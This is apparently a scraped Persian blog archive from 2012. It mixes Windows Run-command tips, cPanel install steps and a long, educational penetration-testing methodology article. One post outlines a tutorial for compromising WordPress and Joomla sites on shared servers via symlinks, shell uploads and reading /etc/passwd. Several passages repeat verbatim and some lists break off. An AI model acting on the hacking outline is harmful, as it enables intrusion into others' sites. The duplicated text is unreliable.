amozeshe metasploit az paye
http://ashiyane.org/forums/showthread.php?t=77562
Monday, August 13, 2012
Thursday, August 9, 2012
Sunday, August 5, 2012
Friday, August 3, 2012
سـلام دوسـتان
اینجا میخوام اموزش گام به گام سیملینک به صورت تصویری یاد بدم
تواشیانه گشتم اما این اموزش NeW هست و تاپیک یا اموزش مشابهی نداره
من در این اموزش که 5 پارت هست این ها رو اموزش میدم
2-خواندن کانفیگ اکثر سایت های روی سرور و دیدن سایت های روی سرور
3-نفوذ به سایت های وردپرس با اپدیت رمز به صورت MD5 و یا بدست اوردن رمز سایت های وردپرس با فراموشی رمز و شل ریزی
4-نفوذ به سایت های جوملا با اپدیت رمز و شل ریزی
5-نفوذ به یک سایت بدون باگ روی سرور به صورت سریع و کمتر از 1 دقیقه
اینجا میخوام اموزش گام به گام سیملینک به صورت تصویری یاد بدم
تواشیانه گشتم اما این اموزش NeW هست و تاپیک یا اموزش مشابهی نداره
من در این اموزش که 5 پارت هست این ها رو اموزش میدم
نقل قول:
1-بایپس سیف مد و Disabled Functions و اجرا کردن دستور more /etc/passwd برا خوندن etc\passwd با شل WebRoot2-خواندن کانفیگ اکثر سایت های روی سرور و دیدن سایت های روی سرور
3-نفوذ به سایت های وردپرس با اپدیت رمز به صورت MD5 و یا بدست اوردن رمز سایت های وردپرس با فراموشی رمز و شل ریزی
4-نفوذ به سایت های جوملا با اپدیت رمز و شل ریزی
5-نفوذ به یک سایت بدون باگ روی سرور به صورت سریع و کمتر از 1 دقیقه
Monday, July 30, 2012
بدون شک استفاده از دستورات متنی به نسبت
استفاده از ماوس نیازمند هوش و ذکاوت بیشتری است اما برای این کار نیازی
نیست برنامه نویس و یا کاربر فوقحرفهای باشید. تنها کافی است با زومیت
همراه باشید تا با بهترین دستورات متنی ویندوز آشنا شوید تا امور روزمره
خود را سریعتر از پیش انجام دهید.
در ویندوز 7 و ویندوز 8 بصورت پیش فرض خبری از Run نیست اما برای دسترسی سریع به آن میتوانید از کلیدهای ترکیبی Winkey+R استفاده کنید (از روی کیبرد کلیدی که لوگوی ویندوز برروی آن است را نگه داشته و R را فشار دهید.) حال میتوانید دستوراتی که در ادامه آمده را در همین جعبه Run وارد کنید.
در ویندوز 7 و ویندوز 8 بصورت پیش فرض خبری از Run نیست اما برای دسترسی سریع به آن میتوانید از کلیدهای ترکیبی Winkey+R استفاده کنید (از روی کیبرد کلیدی که لوگوی ویندوز برروی آن است را نگه داشته و R را فشار دهید.) حال میتوانید دستوراتی که در ادامه آمده را در همین جعبه Run وارد کنید.
دسترسی سریع به پوشه حاوی فایلهای موقت
اگر تا به حال به پوشه حاوی فایلهای موقت خود سر نزدهاید بدون شک با مراجعه و حذف فایلهای درون آن چند گیگابایتی از فضای دیسک خود را آزاد کردهاید. برای دسترسی سریع به پوشه Temp عبارت زیر را در Run وارد نمایید:
%temp%
دسترسی سریع به پوشه Program Files
معمولا اکثر نرمافزارهای نصب شده برروی ویندوز در فولدر Program Files در درایو سیستمعامل ذخیره میشوند. اگر دوستان یا اقوام مبتدیتان برای رفع مشکلات کامپیوتر از شما کمک میگیرند این دستور میتواند به شما کمک شایانی کند. برای دسترسی به این پوشه میتوانید از دستور زیر استفاده کنید:
%programfiles%
دسترسی سریع به پوشه پروفایل کاربر
همانند دو دستور قبل با دستور زیر به سرعت میتوانید به پوشه حاوی اطلاعات کاربری که با آن لاگین کردهاید دسترسی داشته باشید. در این پوشه، فولدرهای عکس، موزیک، ویدیو و دیگر اطلاعات شخصی شما وجود دارند.
%userprofile%
دسترسی سریع به کنترل پنل
برای دسترسی سریع به کنترل پنل همواره میتوانید عبارت Control را در CMD یا Run وارد کنید.
دسترسی سریع به Disk Cleanup
به کمک ابزار داخلی Disk Cleanup ویندوز، میتوانید از شر فایلهای اضافی و موقت خلاص شده و فضای خالی دیسک سخت خود را آزاد کنید. برای دسترسی آسان به آن نیز از دستور زیر استفاده نمایید:
cleanmgr
دسترسی سریع به بخش مدیریت کامپیوتر
در بخش Computer Management میتوانید فولدرهای بهاشتراک گذاشته شده را کنترل کنید و یا کاربران سیستم و دیسک سخت و غیره را مدیریت کنید. برای دسترسی سریع به این قسمت میتوانید در ویندوز اکسپی برروی My Computer و یا در ویندوز 7 بر روی Computer راست کلیک نموده و Manage را انتخاب کنید اما راه دیگر وارد نمودن دستور زیر در Run است:
compmgmt.msc
دسترسی سریع به تنظیمات فایروال
تمایل دارید فایروال ویندوز را فعال یا غیرفعال کنید و یا یک دسترسی به یک پورت خاص را محدود کنید؟ از دستور زیر استفاده نمایید:
Firewall.cpl
دسترسی سریع به پوشههای اشتراک گذاشته شده
برای دسترسی سریع به فولدرهای اشتراک گذاشته شده میتوانید از دستور زیر استفاده نماید:
Fsmgmt.msc
مرورصفحات وب در مرورگرهای مختلف
برای اجرای مرورگرهای مختلف میتوانید نام آنها (iexplore, chrome, firefox, opera) را در Run وارد نمایید البته به شرطی که آنها را برروی سیستم خود نصب کرده باشید! اما کار به اینجا ختم نمیشود شما میتوانید علاوه بر باز کردن مرورگرها با اضافه کردن نام وب سایت مورد نظر خود در جلوی اسم مرورگر، آن صفحه خاص را باز کنید. به عنوان مثال با وارد کردن دستور زیر در Run میتوانید نت گارد را در مرورگر اینترنت اکسپلور باز نمایید:
iexplore www.netqurd.com
مشاهده کلیه اطلاعات مربوط به سیستم
System Information ابزار داخلی ویندوز است که از طریق آن میتوانید به مشخصات سختافزاری و نرم افزاری کامپیوتر خود دسترسی داشته باشید برای اجرای سریع این ابزار میتوانید از دستور زیر استفاده نمایید:
msinfo32
اضافه و یا حذف سریع کاربر
User Account یکی از ابزارهای جالب ویندوز برای مدیریت کاربران بشکل حرفهای است، از طریق این ابزار میتوانید دسترسی کاربران مختلف را تعیین کنید و یا کاربر جدید اضافه و کم نمایید. برای دسترسی سریع به این ابزار از دستور زیر استفاده کنید:
Netplwiz
اجرای کیبرد مجازی
ویندوز دارای یک کیبرد مجازی با نام Onscreen Keyboard است که برای ورود اطلاعات مهم مانند رمز حساب بانکی استفاده میشود. اگر ویروسی نبودن یا وجود Keyloggerها (برنامههای مخربی که حروف تایپشده با کیبرد را ذخیره نموده و برای افراد دیگر ارسال میکنند) در کامپیوتر خود مطمئن نیستید میتوانید از این صفحهکلید استفاده نمایید. علاوه بر این اگر کیبرد لپتاپ یا کامپیوتر شما خراب شده میتوانید صفحه کلید مجازی را اجرا کنید. برای فعال کردن آن نیز میتوانید عبارت زیر را در Run یا CMD وارد کنید:
Osk
خروج و یا خاموش کردن کامپیوتر
برای خاموش کردن کامپیوتر میتوانید از دستور shutdown و برای لاگآف کردن نیز از دستور logoff استفاده کنید. اگر از دستور Shutdown استفاده کردید و چند لحظه بعد از کرده خود پشیمان شدید میتوانید با دستور زیر عملیات خاموش شدن سیستم را متوقف کنید:
Shutdown –a
اجرای سریع مدیریت ابزارهای کاربردی
Utility Manager مجموعهای از ابزارهای ویندوزی است که کار را برای کاربر آسان میکند در این قسمت شما میتوانید به همان کیبرد مجازی به همراه، ابزار بزرگنمایی تصویر و یا گوینده صوتی ویندوز دسترسی داشته باشید. برای دسترسی سریع به این بخش از دستور زیر استفاده نمایید:
Utilman
دسترسی سریع به نرمافزار ویراستار
حتما با نوتپد ویندوز که با دستور notepad اجرا میشود آشنا هستید اما به ویرایشگر قویتر داخلی ویندوز یعنی Wordpad نیاز دارید میتوانید آن را با دستور زیر اجرا کنید:
Write
Sunday, July 29, 2012
Sunday, July 22, 2012
برای نصب سی پانل نخست از برنامه Putty وارد SSH شوید و دستورات زیر رو وارد کنید تا مرحله نصب آغاز شود:
mkdir /home/cpins
cd /home/cpins
wget http://layer1.cpanel.net/latest
sh latest
بعد از دستور چهارم بین 20 تا 80 دقیقه (ممکن است بیشتر هم شود بسته به نوع سخت افزار سرور مجازی و یا اختصاصی) یکسری نشانه مثل ++++++ **---- میاد و میره و در نهایت تمام میشه.
بعد از اتمام به این روش وارد کنترل پانل شوید:
https://yourserverip:2087
توجه: به جای YourServerIP هم آدرس آی پی سرور خودتون را باید بزنید.
بعدموقع نصب میرسه که چه گزینه هایی رو انتخاب کنید تا تنظیمات تمام بشه.
این گزینه ها شخصی است . توی گزینه ها صفحه اول قبول قوانین است صفحه های بعدی هم مربوط به وارد کردن DNS سرور انتخاب سیستم وب میل و .... است که اینا شخصی است تنظیماتش و خودتون باید انتخاب کنید.
mkdir /home/cpins
cd /home/cpins
wget http://layer1.cpanel.net/latest
sh latest
بعد از دستور چهارم بین 20 تا 80 دقیقه (ممکن است بیشتر هم شود بسته به نوع سخت افزار سرور مجازی و یا اختصاصی) یکسری نشانه مثل ++++++ **---- میاد و میره و در نهایت تمام میشه.
بعد از اتمام به این روش وارد کنترل پانل شوید:
https://yourserverip:2087
توجه: به جای YourServerIP هم آدرس آی پی سرور خودتون را باید بزنید.
بعدموقع نصب میرسه که چه گزینه هایی رو انتخاب کنید تا تنظیمات تمام بشه.
این گزینه ها شخصی است . توی گزینه ها صفحه اول قبول قوانین است صفحه های بعدی هم مربوط به وارد کردن DNS سرور انتخاب سیستم وب میل و .... است که اینا شخصی است تنظیماتش و خودتون باید انتخاب کنید.
Wednesday, July 18, 2012
Sunday, July 15, 2012
NETQURD
http://www.netqurd.com/books/network/1260-%D8%AD%D9%85%D9%84%D8%A7%D8%AA-Man-in-the-Middle-%28%D8%A2%D9%84%D9%88%D8%AF%DA%AF%DB%8C-%D8%AD%D8%A7%D9%81%D8%B8%D9%87-%D9%86%D9%87%D8%A7%D9%86-ARP%29-%E2%80%93-%D9%82%D8%B3%D9%85%D8%AA-%D8%A7%D9%88%D9%84.html
آموزش کامل تنظیمات فایروال (Firewall ) در ویندوز
http://www.netqurd.com/books/windows/768-%D8%A2%D9%85%D9%88%D8%B2%D8%B4-%DA%A9%D8%A7%D9%85%D9%84-%D8%AA%D9%86%D8%B8%DB%8C%D9%85%D8%A7%D8%AA-%D9%81%D8%A7%DB%8C%D8%B1%D9%88%D8%A7%D9%84-%28Firewall-%29-%D8%AF%D8%B1-%D9%88%DB%8C%D9%86%D8%AF%D9%88%D8%B2-7.htmlحملات MITM (آلودگی حافظه نهان ARP) – قسمت اول
http://www.netqurd.com/books/network/1260-%D8%AD%D9%85%D9%84%D8%A7%D8%AA-Man-in-the-Middle-%28%D8%A2%D9%84%D9%88%D8%AF%DA%AF%DB%8C-%D8%AD%D8%A7%D9%81%D8%B8%D9%87-%D9%86%D9%87%D8%A7%D9%86-ARP%29-%E2%80%93-%D9%82%D8%B3%D9%85%D8%AA-%D8%A7%D9%88%D9%84.html
پیش نیاز اجرای تست نفوذ
هر شركت یا سازمان، پیش از اجرای تست نفوذ، به یك سیاست امنیتی كامپیوتر نیاز دارد. سیاست امنیتی، یك آئین نامه رسمی از قوانینی است كه باید توسط افرادی كه دسترسی به دارایی های اطلاعاتی و فناوری یك شركت یا سازمان دارند، رعایت شوند. تدوین سیاست امنیتی باید با توجه به ارزش دارایی ها و منابع اطلاعاتی شركت انجام شده و سپس رویه های امنیتی مناسب با آنها ایجاد شوند. فاكتور اصلی در تعیین رویه ها و كنش های امنیتی مناسب در سیاست امنیتی كامپیوتر، هزینه ای است كه شركت در صورت از دست دادن داده ها متحمل می شود. برای مثال، در صورتی كه شركتی با اطلاعات دولتی و یا مالی سر و كار داشته باشد، روند غیر فعال كردن یك حساب كاربری (User ID) در آن، متفاوت از یك دانشكده خواهد بود. به علاوه اگر شركتی دارای اطلاعات خصوصی، اسرار تجاری و یا لیست مشتریانی است كه رقبا نباید از آن اطلاع حاصل كنند، لازم است ارزش امنیتی بالاتری را برای اطلاعات مذكور قائل شده و گام های امنیتی مناسب برای حفاظت از آنها برداشته شود.
یك سیاست امنیتی كامپیوتر باید موارد زیر را پوشش دهد:
برنامه ریزی تست نفوذ
قبل از اجرای تست نفوذ لازم است برای آن برنامه ریزی شده و میزان آزادی عمل تست و قلمروی آن دقیقاً معین شود. همچنین در این مرحله در مورد اجرای تست به شیوه جعبه سفید و یا جعبه سیاه تصمیم گیری صورت می گیرد، اعضای تیم مشخص می گردند، معیارهای موفقیت تست تعریف می شوند و مجوز مدیریت دریافت می گردد. در این مرحله با توجه به حوزه تست نفوذ، پارامترهای ضروری برای تشخیص آسیب پذیری ها تعیین می گردد. مواردی كه در زمینه برنامه ریزی تست نفوذ باید مورد توجه قرار گیرند عبارتند از:
جمع آوری اطلاعات (شناسایی)
پس از تعیین قلمروی تست نفوذ، نوبت به جمع آوری اطلاعات درباره شركت هدف تست می رسد. تست نفوذ معمولاً با سه مرحله پیش تست آغاز می شود. footprinting، scanning و enumerating. این سه مرحله پیش تست بسیار مهم هستند زیرا تفاوت بین یك تست موفق كه تصویری كامل از شبكه هدف را فراهم می سازد و یك تست ناموفق كه این كار را انجام نمی دهد، از این سه مرحله ناشی می شود. این سه با یكدیگر به عنوان گام شناسایی یا reconnaissance شناخته می شوند. در این گام سعی می شود تا حد امكان اطلاعات در مورد شبكه هدف جمع آوری گردد و شامل هفت زیر مرحله می شود:
1. جمع آوری اطلاعات اولیه
2. مشخص كردن دامنه آدرس های IP شبكه
3. شناسایی رایانه های فعال
4. كشف پورت های باز و نقاط دسترسی
5. شناسایی سیستم عامل
6. شناسایی سرویس های ارائه شده در هر پورت
7. نگاشت شبكه
در زیر در مورد هر كدام از گام های پیش تست بیشتر توضیح می دهیم:
Scanning
چهار مرحله بعدی گام شناسایی (شناسایی رایانه های فعال، كشف پورت های باز و نقاط دسترسی، شناسایی سیستم عامل و شناسایی سرویس های ارائه شده در هر پورت) به عنوان بخشی از مرحله پویش یا Scanning در نظر گرفته می شوند. در این مرحله هدف جمع آوری اطلاعات در مورد پورت های باز، پویش برنامه های كاربردی، ping كردن دستگاه ها، مشخص كردن حدود شبكه و پویش پورت های هر دستگاه به تنهایی است. این مرحله نسبت به footprinting پویاتر بوده و اطلاعات جزئی تری از هدف جمع آوری می شود. مانند مرحله قبل برخی ابزارها در این مرحله یاری رسانند مانند NMap، ping، Telnet ،Traceroute، SuperScan، Netcat، NeoTrace و Visual Route. برای مثال با استفاده از Ping می توان یك تقاضای ICMP ECHO را به یك میزبان شبكه مشخص ارسال كرد. در دستور ping می توان یك پورت را نیز تعیین كرد كه دریافت پاسخ، نشان دهنده باز بودن پورت مذكور برای ارتباط TCP/IP است. همچنین با استفاده از Telnet می توان یك ارتباط تعاملی را با یك میزبان مشخص برقرار كرده و یك پورت را در این دستور وارد كرد. دریافت پاسخ نشان دهنده باز بودن پورت مذكور برای ارتباط TCP/IP است. Traceroute ابزار دیگری است كه مسیرهای ارتباطی اینترنت را بین دو سیستمی كه ارتباط TCP/IP دارند، مشخص می سازد.
Enumerating
آخرین مرحله گام شناسایی نگاشت شبكه است كه با استفاده از اطلاعات Scanning انجام شده و مرحله Enumerating را تشكیل می دهد. در این مرحله هدف طراحی یك تصویر نسبتاً كامل از شبكه هدف است. در این مرحله اطلاعات نام كاربران و گروه ها، منابع شبكه به اشتراك گذاشته شده و برنامه های كاربردی جمع آوری می گردد. مخصوصاً اطلاعات مربوط به سیستم عامل مورد استفاده (همراه با نسخه آن) و برنامه های كاربردی نصب شده و نسخه آنها اطلاعات باارزشی در این زمینه محسوب می شوند. با دانستن نوع سیستم عامل و برنامه های كاربردی می توان از آسیب پذیری های شناخته شده موجود در آنها جهت پیاده سازی نفوذ استفاده كرد. در این مرحله می توان از تكنیك های زیر استفاده كرد:
هر كدام از ابزارها و تكنیك های فوق می توانند در مورد ارتباطات شبكه و یا سیستم میزبان نیز اطلاعات بیشتری را در اختیار بگذارند. در این مرحله از تست كه اولین مرحله است، توصیه به جمع آوری هر چه بیشتر اطلاعات می شود. اطلاعات مذكور از طرفی انتخاب تست های قابل انجام را راحت تر می كنند و از طرف دیگر تست را بیشتر به شبیه سازی یك نفوذ واقعی هدایت می كنند. هكرهای واقعی قبل از انجام حمله تا جایی كه می توانند به مطالعه و تحقیق در مورد سیستم مورد حمله می پردازند و لذا یك انجام دهنده تست نفوذ نیز بایستی با اطلاعاتی مشابه یك هكر واقعی به انجام تست بپردازد. هر چقدر اطلاعات كمتری توسط ابزارهای فوق به دست آید، نشان دهنده امنیت بالاتر سیستم است.
به كارگیری آسیب پذیری ها با هدف نفوذ
در مرحله سوم تست نفوذ، برای شناسایی مشكلات مربوط به تنظیمات سیستم، از ابزارهای پویش كردن آسیب پذیری ها و Password Crackers استفاده می شود. برخی از ابزارهای قابل استفاده در این زمینه عبارتند از:
Nessus – ابزاری برای تشخیص آسیب پذیری ها در سیستم های Unix
SARA – دومین نسل از ابزار پویش آسیب پذیری SATAN
Whisker – ابزار پویش آسیب پذیری در CGI
Hping2 – یك ابزار شبكه است كه می تواند بسته های دلخواه ICMP، UDP و TCP را ارسال كند و برای آزمودن قوانین فایروال و بررسی قطعات (fragments) بسته ها استفاده می شود.
Firewalk - یك ابزار شبیه دنبال كننده های مسیر است كه اجازه دسترسی به Access Control List یك فایروال را می دهد و همچنین امكان در آوردن نقشه شبكه را نیز فراهم می كند.
(NAT(NetBIOS Auditing tool – یك ابزار برای مشخص كردن آسیب پذیری ها در تنظیمات NetBIOS یك سیستم NT است.
Toneloc – ابزاری برای بررسی مودم سیستم های رومیزی است كه برای جواب دهی اتوماتیك و یا اجرای نرم افزار از راه دور به كار می روند.
برخی ابزارهای تجاری نیز در این زمینه وجود دارند كه عبارتند از:
(Internet Security Server (ISS – این محصول بسیار پر كاربرد است و بسیاری از شركت های انجام دهنده تست نفوذ از آن برای شناسایی آسیب پذیری ها استفاده می كنند.
CyberCop – این ابزار نیز برای پویش آسیب پذیری ها به كار می رود.
Phonesweep - ابزاری برای بررسی مودم سیستم های رومیزی است كه برای جواب دهی اتوماتیك و یا اجرای نرم افزار از راه دور به كار می روند.
به غیر از موارد ذكر شده در بالا ابزارهایی نیز برای تشخیص نفوذ و مدیریت داده های تولید شده در روند تشخیص نفوذ وجود دارند. البته مبحث تشخیص نفوذ با اینكه مرتبط با تست نفوذ است ولی نیازمند بررسی جداگانه و مفصلی است و لذا از آوردن ابزارهای مرتبط با آن خودداری كرده ایم.
بعد از انتخاب ابزارهای ارزیابی آسیب پذیری، باید از آنها بر روی سیستم ها و شبكه استفاده كرد. اطلاعاتی كه از ابزارهای فوق به دست می آید، به روشنی آسیب پذیری های اصلی را مشخص می كنند. در این مرحله لازم است با توجه به نوع نفوذ، كاری انجام داد تا وجود آسیب پذیری را به اثبات رساند. برای مثال باید فایلی را در منطقه كنترل شده قرار داد و یا كلمه عبور مربوط به نام كاربری مهمان را تغییر داد. همچنین در موارد دسترسی های فیزیكی باید بخشی از پرونده ای را برداشت و یا در شبیه سازی حملات مهندسی اجتماعی می توان به شماره تلفن منزل مدیر سیستم دسترسی پیدا كرد.
در این مرحله برخی از حملات مانند حملات تزریق SQL، XSS، سرریز بافر و تروجان ها نیز بر روی شبكه شبیه سازی می شوند.
پاكسازی
در این مرحله تمام فایل هایی كه در حین تست نفوذ انجام شده اند پاك شده و تمام تنظیمات و یا پارامترهایی كه تغییر یافته اند به حالت اولیه باز می گردند. همچنین تمام ردپاها پاك شده و تمام سیستم هایی كه به آنها نفوذ شده است به حالت پیش از تست نفوذ بر می گردند.
هر شركت یا سازمان، پیش از اجرای تست نفوذ، به یك سیاست امنیتی كامپیوتر نیاز دارد. سیاست امنیتی، یك آئین نامه رسمی از قوانینی است كه باید توسط افرادی كه دسترسی به دارایی های اطلاعاتی و فناوری یك شركت یا سازمان دارند، رعایت شوند. تدوین سیاست امنیتی باید با توجه به ارزش دارایی ها و منابع اطلاعاتی شركت انجام شده و سپس رویه های امنیتی مناسب با آنها ایجاد شوند. فاكتور اصلی در تعیین رویه ها و كنش های امنیتی مناسب در سیاست امنیتی كامپیوتر، هزینه ای است كه شركت در صورت از دست دادن داده ها متحمل می شود. برای مثال، در صورتی كه شركتی با اطلاعات دولتی و یا مالی سر و كار داشته باشد، روند غیر فعال كردن یك حساب كاربری (User ID) در آن، متفاوت از یك دانشكده خواهد بود. به علاوه اگر شركتی دارای اطلاعات خصوصی، اسرار تجاری و یا لیست مشتریانی است كه رقبا نباید از آن اطلاع حاصل كنند، لازم است ارزش امنیتی بالاتری را برای اطلاعات مذكور قائل شده و گام های امنیتی مناسب برای حفاظت از آنها برداشته شود.
یك سیاست امنیتی كامپیوتر باید موارد زیر را پوشش دهد:
- اتصالات از/به اینترنت
- اتصالات از طریق خط تلفن (dial-up)
- امنیت دسترسی فیزیكی
- مدیریت كلمه عبور
- مسئولیت ها و حقوق كاربران
- مسئولیت ها و حقوق مدیران
- محافظت از اطلاعات حساس
- روال های پاسخگویی به فوریت ها
- مستند سازی
- پشتیبان گیری از اطلاعات
- گزارش ها و ثبت وقایع (logs)
- رسیدگی به رخدادها
- چگونگی گزارش یك مشكل یا رخداد امنیتی
- تخلفاتی كه باید گزارش شوند
- اجرای سیاست
- مسئول نهایی
برنامه ریزی تست نفوذ
قبل از اجرای تست نفوذ لازم است برای آن برنامه ریزی شده و میزان آزادی عمل تست و قلمروی آن دقیقاً معین شود. همچنین در این مرحله در مورد اجرای تست به شیوه جعبه سفید و یا جعبه سیاه تصمیم گیری صورت می گیرد، اعضای تیم مشخص می گردند، معیارهای موفقیت تست تعریف می شوند و مجوز مدیریت دریافت می گردد. در این مرحله با توجه به حوزه تست نفوذ، پارامترهای ضروری برای تشخیص آسیب پذیری ها تعیین می گردد. مواردی كه در زمینه برنامه ریزی تست نفوذ باید مورد توجه قرار گیرند عبارتند از:
-
مدت زمان انجام تست چقدر است؟
-
چه كسانی از انجام تست اطلاع دارند؟
-
چه كسی تأیید كننده دسترسی غیر مجاز است؟
-
چه منابع و سیستم هایی و چگونه تست شوند ؟
-
تنظیمات فایروال
-
اطلاعات كامل
-
بدون اطلاعات
-
-
سیستم های میزبان
-
وب سرورها
-
انتخاب كلمات عبور
-
چگونگی به اشتراك گذاری
-
سرورهای FTP
-
سیستم تشخیص نفوذ
-
-
سرورهای DNS
-
مودم ها Dial in
-
دسترسی های بی سیم
-
Public Branch Exchange)PBX)
-
غیر فعال سازی UserID و یا روند خارج شدن یك كارمند از سیستم
-
دسترسی های فیزیكی
-
مهندسی اجتماعی
-
كامپیوترهای رومیزی
-
انتخاب كلمات عبور
-
تنظیمات مودم ها برای پاسخگویی اتوماتیك و یا دسترسی به نرم افزارهای خارجی
-
-
-
چگونگی ارائه نتایج
-
بعد از چه مدت زمانی، تست دیگری برای اطمینان از نتایج تغییرات انجام می شود؟
جمع آوری اطلاعات (شناسایی)
پس از تعیین قلمروی تست نفوذ، نوبت به جمع آوری اطلاعات درباره شركت هدف تست می رسد. تست نفوذ معمولاً با سه مرحله پیش تست آغاز می شود. footprinting، scanning و enumerating. این سه مرحله پیش تست بسیار مهم هستند زیرا تفاوت بین یك تست موفق كه تصویری كامل از شبكه هدف را فراهم می سازد و یك تست ناموفق كه این كار را انجام نمی دهد، از این سه مرحله ناشی می شود. این سه با یكدیگر به عنوان گام شناسایی یا reconnaissance شناخته می شوند. در این گام سعی می شود تا حد امكان اطلاعات در مورد شبكه هدف جمع آوری گردد و شامل هفت زیر مرحله می شود:
2. مشخص كردن دامنه آدرس های IP شبكه
3. شناسایی رایانه های فعال
4. كشف پورت های باز و نقاط دسترسی
5. شناسایی سیستم عامل
6. شناسایی سرویس های ارائه شده در هر پورت
7. نگاشت شبكه
در زیر در مورد هر كدام از گام های پیش تست بیشتر توضیح می دهیم:
Footprinting
در این مرحله دو گام اول مرحله شناسایی یعنی جمع آوری اطلاعات اولیه و مشخص كردن دامنه آدرس های IP شبكه هدف صورت انفعالی انجام می پذیرد. این مرحله بسیار مهم است زیرا هكرها می توانند اطلاعات به دست آمده در این مرحله را بدون آگاهی سازمان هدف جمع آوری كنند. در این زمینه تعدادی منابع و ابزار رایگان و تجاری وجود دارند كه می توانند در به دست آوردن اطلاعات اولیه كمك خوبی باشند. دسترسی به بعضی از این منابع مانند خبرنامه های شركت بسیار آسان است. تست كنندگان با استفاده از این منبع به اطلاعات مفیدی دست پیدا می كنند كه كارمندان حتی بدون آنكه متوجه باشند آنها را بروز می دهند. دیگر روش ها برای جمع آوری اطلاعات استفاده از Whois، Nslookup، Smart Whois و SamSpade است. برای مثال Whois با استفاده از سرویس های دایركتوری، اطلاعاتی را در مورد دامنه ها و ثبت كنندگان آنها در اختیار می گذارد و Nslookup یك پرس و جوی تعاملی را با سرورهای نام دامنه انجام می دهد.
در این مرحله دو گام اول مرحله شناسایی یعنی جمع آوری اطلاعات اولیه و مشخص كردن دامنه آدرس های IP شبكه هدف صورت انفعالی انجام می پذیرد. این مرحله بسیار مهم است زیرا هكرها می توانند اطلاعات به دست آمده در این مرحله را بدون آگاهی سازمان هدف جمع آوری كنند. در این زمینه تعدادی منابع و ابزار رایگان و تجاری وجود دارند كه می توانند در به دست آوردن اطلاعات اولیه كمك خوبی باشند. دسترسی به بعضی از این منابع مانند خبرنامه های شركت بسیار آسان است. تست كنندگان با استفاده از این منبع به اطلاعات مفیدی دست پیدا می كنند كه كارمندان حتی بدون آنكه متوجه باشند آنها را بروز می دهند. دیگر روش ها برای جمع آوری اطلاعات استفاده از Whois، Nslookup، Smart Whois و SamSpade است. برای مثال Whois با استفاده از سرویس های دایركتوری، اطلاعاتی را در مورد دامنه ها و ثبت كنندگان آنها در اختیار می گذارد و Nslookup یك پرس و جوی تعاملی را با سرورهای نام دامنه انجام می دهد.
Scanning
چهار مرحله بعدی گام شناسایی (شناسایی رایانه های فعال، كشف پورت های باز و نقاط دسترسی، شناسایی سیستم عامل و شناسایی سرویس های ارائه شده در هر پورت) به عنوان بخشی از مرحله پویش یا Scanning در نظر گرفته می شوند. در این مرحله هدف جمع آوری اطلاعات در مورد پورت های باز، پویش برنامه های كاربردی، ping كردن دستگاه ها، مشخص كردن حدود شبكه و پویش پورت های هر دستگاه به تنهایی است. این مرحله نسبت به footprinting پویاتر بوده و اطلاعات جزئی تری از هدف جمع آوری می شود. مانند مرحله قبل برخی ابزارها در این مرحله یاری رسانند مانند NMap، ping، Telnet ،Traceroute، SuperScan، Netcat، NeoTrace و Visual Route. برای مثال با استفاده از Ping می توان یك تقاضای ICMP ECHO را به یك میزبان شبكه مشخص ارسال كرد. در دستور ping می توان یك پورت را نیز تعیین كرد كه دریافت پاسخ، نشان دهنده باز بودن پورت مذكور برای ارتباط TCP/IP است. همچنین با استفاده از Telnet می توان یك ارتباط تعاملی را با یك میزبان مشخص برقرار كرده و یك پورت را در این دستور وارد كرد. دریافت پاسخ نشان دهنده باز بودن پورت مذكور برای ارتباط TCP/IP است. Traceroute ابزار دیگری است كه مسیرهای ارتباطی اینترنت را بین دو سیستمی كه ارتباط TCP/IP دارند، مشخص می سازد.
Enumerating
آخرین مرحله گام شناسایی نگاشت شبكه است كه با استفاده از اطلاعات Scanning انجام شده و مرحله Enumerating را تشكیل می دهد. در این مرحله هدف طراحی یك تصویر نسبتاً كامل از شبكه هدف است. در این مرحله اطلاعات نام كاربران و گروه ها، منابع شبكه به اشتراك گذاشته شده و برنامه های كاربردی جمع آوری می گردد. مخصوصاً اطلاعات مربوط به سیستم عامل مورد استفاده (همراه با نسخه آن) و برنامه های كاربردی نصب شده و نسخه آنها اطلاعات باارزشی در این زمینه محسوب می شوند. با دانستن نوع سیستم عامل و برنامه های كاربردی می توان از آسیب پذیری های شناخته شده موجود در آنها جهت پیاده سازی نفوذ استفاده كرد. در این مرحله می توان از تكنیك های زیر استفاده كرد:
- به دست آوردن اطلاعات Active Directory و شناسایی كاربران آسیب پذیر
- شناسایی NetBIOS با استفاده از Nbscan
- استفاده از SNMPutil برای SNMP
- به كارگیری پرس و جوهای DNS
- ایجاد ارتباطات و نشست هایnull
هر كدام از ابزارها و تكنیك های فوق می توانند در مورد ارتباطات شبكه و یا سیستم میزبان نیز اطلاعات بیشتری را در اختیار بگذارند. در این مرحله از تست كه اولین مرحله است، توصیه به جمع آوری هر چه بیشتر اطلاعات می شود. اطلاعات مذكور از طرفی انتخاب تست های قابل انجام را راحت تر می كنند و از طرف دیگر تست را بیشتر به شبیه سازی یك نفوذ واقعی هدایت می كنند. هكرهای واقعی قبل از انجام حمله تا جایی كه می توانند به مطالعه و تحقیق در مورد سیستم مورد حمله می پردازند و لذا یك انجام دهنده تست نفوذ نیز بایستی با اطلاعاتی مشابه یك هكر واقعی به انجام تست بپردازد. هر چقدر اطلاعات كمتری توسط ابزارهای فوق به دست آید، نشان دهنده امنیت بالاتر سیستم است.
به كارگیری آسیب پذیری ها با هدف نفوذ
در مرحله سوم تست نفوذ، برای شناسایی مشكلات مربوط به تنظیمات سیستم، از ابزارهای پویش كردن آسیب پذیری ها و Password Crackers استفاده می شود. برخی از ابزارهای قابل استفاده در این زمینه عبارتند از:
Nessus – ابزاری برای تشخیص آسیب پذیری ها در سیستم های Unix
SARA – دومین نسل از ابزار پویش آسیب پذیری SATAN
Whisker – ابزار پویش آسیب پذیری در CGI
Hping2 – یك ابزار شبكه است كه می تواند بسته های دلخواه ICMP، UDP و TCP را ارسال كند و برای آزمودن قوانین فایروال و بررسی قطعات (fragments) بسته ها استفاده می شود.
Firewalk - یك ابزار شبیه دنبال كننده های مسیر است كه اجازه دسترسی به Access Control List یك فایروال را می دهد و همچنین امكان در آوردن نقشه شبكه را نیز فراهم می كند.
(NAT(NetBIOS Auditing tool – یك ابزار برای مشخص كردن آسیب پذیری ها در تنظیمات NetBIOS یك سیستم NT است.
Toneloc – ابزاری برای بررسی مودم سیستم های رومیزی است كه برای جواب دهی اتوماتیك و یا اجرای نرم افزار از راه دور به كار می روند.
برخی ابزارهای تجاری نیز در این زمینه وجود دارند كه عبارتند از:
